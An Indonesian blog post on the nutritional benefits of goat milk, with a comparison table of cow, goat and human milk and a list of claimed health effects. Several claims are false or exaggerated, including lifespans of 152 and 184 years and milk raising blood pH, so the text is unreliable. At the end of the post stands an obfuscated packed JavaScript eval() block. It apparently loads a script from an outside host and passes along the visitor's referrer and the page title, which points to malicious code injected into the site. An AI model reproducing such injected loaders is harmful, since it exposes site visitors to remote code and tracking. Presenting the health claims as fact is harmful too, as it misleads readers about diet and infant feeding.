browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Gurihnya Gizi Susu Kambing

Posted by on December 30, 2013

susu kambing

Karena tadi lihat gambar kambing minum susu yang bikin ketawa jadi timbul ide untuk nulis ini. Memang agak basi karena sudah banyak situs/blog/artikel yang membahas tentang susu kambing ini, tetapi bukankah ada pepatah lebih baik terlambat daripada tidak ? Semoga saja sedikit ulasan yang dirangkum dari berbagai sumber ini masih bermanfaat bagi siapa saja yang membacanya.

Meskipun tidak sepopuler susu sapi, namun susu kambing sudah mulai dikenal di masyarakat. Pasalnya, susu kambing ini lebih aman dikonsumsi untuk mereka yang memang alergi terhadap lemak susu. Di Timur Tengah, susu kambing sudah dikonsumsi lebih dari 1000 tahun silam.

Bahkan menurut Journal of American Medicine, susu kambing adalah makanan paling lengkap yang diketahui. Ia mengandung vitamin,mineral, elektrolit, unsur kimiawi, enzim, protein, dan asam lemak yang mudah dimanfaatkan tubuh Anda. Bahkan, tubuh Anda dapat mencerna susu kambing hanya dalam 20 menit. Bandingkan dengan 2-3 jam yang dibutuhkan untuk mencerna susu sapi.  Mungkin hal ini disebabkan komposisi dan struktur lemak susu kambing dan sapi memiliki perbedaan. Butiran lemak susu kambing berukuran 2 mikrometer, sementara lemak susu sapi berukuran 2,5 – 3,5 mikrometer. Dengan ukuran lemak lebih kecil, susu kambing lebih cepat terdispersi dan campurannya lebih homogen.

Susu kambing adalah susu yang paling mirip dengan susu ibu dari segi komposisi, nutrisi, dan sifat kimia alami. Hal ini membuat susu kambing menjadi makanan ideal untuk menyapih anak. Eter gliserol yang jauh lebih tinggi pada susu kambing dibandingkan pada susu sapi juga membuat beberapa dokter merekomendasikannya untuk perawatan gizi bayi yang baru lahir.

Kandungan fluorine yang terdapat pada susu kambing berkisar 10 sampai 100 kali lebih besar dibandingkan susu sapi. Kandungan fluorine bermanfaat sebagai antiseptik alami dan dapat membantu menekan pembiakan bakteri di dalam tubuh. Bisa membantu pencernaan dan menetralisir asam lambung, menyembuhkan reaksi-reaksi alergi pada kulit, saluran napas dan pencernaan.

Hal tersebut telah dibuktikan seorang ahli nutrisi Amerika, Dr Bernard Jensen PhD. Beliau meneliti manfaat susu kambing yang menjadi salah satu binatang ternaknya di Escondido, New Mexico, Amerika Serikat.

“Karena kandungan gizinya, susu kambing bisa membantu meningkatkan daya tahan tubuh,” kata Bernard.

Bernard mengatakan, susu kambing mulai banyak direkomendasikan untuk susu bayi, anak-anak maupun orang dewasa yang alergi terhadap susu sapi. “Susu kambing kini cukup populer meskipun harganya lebih mahal jika dibandingkan susu sapi,” katanya. Menurut penelitian, susu kambing bukan saja mengandung sedikit lemak susu, namun juga tinggi akan kandungan nutrisi lainnya. Sebut saja vitamin D, vitamin B12, vitamin C, vitamin A, sodium, pottasium, selenium, kalsium, asam folat dan juga zat besi.

Selengkapnya mengenai perbandingan kandungan gizi beberapa jenis susu dapat dilihat pada tabel berikut:

Nutrisi/jenis susu

sapi

kambing

manusia

lemak %

3,8

3,6

4,0

padatan bukan lemak %

8,9

9,0

8,9

laktosa %

4,1

4,7

6,9

nitrogen %

3,4

3,2

1,2

protein %

3,0

3,0

1,1

kasein %

2,4

2,6

0,4

kalsium %

0,19

0,18

0,04

fosfor  %

0,27

0,23

0,06

klorida %

0,15

0,10

0,06

besi (P/100, 000)

0,07

0,08

0,2

vitamin A (i.u. / g lemak)

39,0

21,0

32,0

vitamin B (ug/100 m)

68,0

45,0

17,0

riboflavin (ug/100ml)

210,0

159,0

26,0

vitamin C (mg asc a/100ml)

2,0

2,0

3,0

vitamin D (i.u. / g lemak)

0,3

0,7

0,07

kalori / 100 ml

70,0

69,0

68,0

kandungan-gizi-kambing

klik gambar untuk lebih jelas

Sebuah penelitian atas orang-orang berumur di atas 100 tahun di 90 negara seperti Margaret Patton yang meninggal pada usia 137, Jonathan Hartop yang berjalan 9 mil sehari pada usia 136 dan hidup sampai 138 tahun, Thomas Parr yang hidup 152 tahun dan Peter Czartin dari Austria hidup sampai 184 tahun, menunjukkan bahwa mereka semua rajin meminum susu kambing. Konon, Mahatma Gandhi dapat segera bugar kembali setelah berpuasa lama karena meminum susu kambing.

Wah amazing banget ya susu yang satu ini sampai Dr Rini Damayanti Moedji dan Bernardius T Wahyu Wiryanta dalam buku Khasiat dan Manfaat Susu Kambing, Susu Terbaik dari Hewan Ruminansia memaparkan, beberapa khasiat susu kambing bagi tubuh manusia. Antara lain, susu kambing bersifat antiseptik alami dan membantu menekan pembiakan bakteri dalam tubuh dan bersifat basa (alkaline food) sehingga aman bagi tubuh.

Selain itu, beberapa manfaat susu kambing bagi kesehatan adalah :

  1.  memperkuat tulang
    ini karena susu kambing merupakan sumber kalsium, sehingga melindungi tubuh dari beberapa sel kanker, keropos tulang, serta gejala pms. 
  2. kesehatan jantung
    berkat tingginya kalium yang dikandungnya, susu kambing baik untuk jantung anda. ini mengatur tekanan darah, mengurangi risiko stroke, serta membantu menahan aterosklerosis ( radang pada pembuluh darah ). 
  3. turunkan berat badan
    susu kambing memiliki kandungan protein  yang baik sehingga dengan meminum sedikit susu kambing sesudah makan dapat membakar lemak lebih cepat. 
  4.  penambah energi
    protein serta riboflavin ( vit. b2 ) dalam susu kambing bagus untuk tingkatkan tingkat daya. misalnya anda menjadi kekurangan daya atau anda tetap menjadi letih di siang hari, cobalah tambahkan susu kambing pada diet anda. 
  5.  baik untuk pencernaan
    susu ini tidak berisi protein kompleks yang merangsang reaksi alergi seperti pada susu sapi. Selain itu, karena mempunyai ukuran molekul yang lebih kecil daripada susu sapi membuat susu kambing ini relative lebih aman bagi pencernaan daripada susu sapi.
  6. Susu kambing tidak menekan sistem kekebalan.
  7. Susu kambing membasakan sistem pencernaan. Susu ini berisi alkali basa sehingga tidak menghasilkan asam dalam sistem usus.
  8. Susu kambing membantu meningkatkan pH aliran darah.
  9. Susu kambing mengandung asam lemak seperti asam kaprilat dan kaprat yang sangat antimikroba. (Mereka benar-benar membunuh bakteri yang digunakan untuk menguji keberadaan antibiotik dalam susu sapi!)
  10. Susu kambing tidak menimbulkan lendir dan tidak merangsang respons pertahanan sistem kekebalan tubuh manusia.
  11. Susu kambing merupakan sumber yang kaya mineral selenium sebagai nutrisi yang diperlukan untuk kekebalan tubuh dan bersifat antioksidan.

 


eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply